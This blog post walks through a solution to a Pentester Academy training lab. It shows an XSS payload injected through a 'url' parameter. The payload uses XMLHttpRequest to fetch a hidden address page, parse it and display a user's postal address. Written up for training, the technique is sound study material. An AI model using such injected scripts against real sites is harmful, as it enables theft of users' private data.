Javascript for Pentester Task 18

View Count. 0
Tag javascript, pentester academy, task 18, web app pentesting

Hello Internet people, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy.This task is just the advance version of task 14. In this task, we learn how to use XML XMLHttpRequest method to fetch data and parse it on the go without users concern. You can view solutions to the other tasks here.

Task 18: HTML Parsing of XMLHttpRequest Response | TASK LINK

The task is to find John’s Postal Address using an XSS vulnerability on that page. This task is same as task 14, but in this task, we have to directly fetch the postal address of John with the link provided in the comment (see solution part). This task is of moderate level, you have to have the knowledge of XMLHttpRequest method. You should know what is the syntax and how to use it.
Solution:
The injection point is the same as in previous tasks is the url parameter, You can apply some injections to verify that too. While viewing the source code you will encounter this comment ” Address can be obtained via a GET request to /lab/webapp/jfp/18/address” this may have been written by the developer. Type in the complete URL “http://pentesteracademylab.appspot.com/lab/webapp/jfp/18/address” into the URL bar and you will see the postal address of John.

<script>
var req = new XMLHttpRequest();
req.onreadystatechange = function(){
if (this.status == 200 && this.readyState == 4)
{
var data = this.responseXML;
var address = data.getElementById('address').innerHTML;
document.getElementById('result').innerHTML = address;
}
};
req.open('GET','http://pentesteracademylab.appspot.com/lab/webapp/jfp/18/address',true);
req.responseType = 'document';
req.send();
</script>

This code will create an XML request to the commented link and retrieve the response in XML format and then grab the address from id=”address” and put that into the div field with id=”result”. Copy and URL-encode the code and paste it after the ’url’ parameter on the same page. Remember the (req.responseType = ‘document’) is important, it will make suitable the response for our further operations on it.
Refer this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided at Pentester Academy website.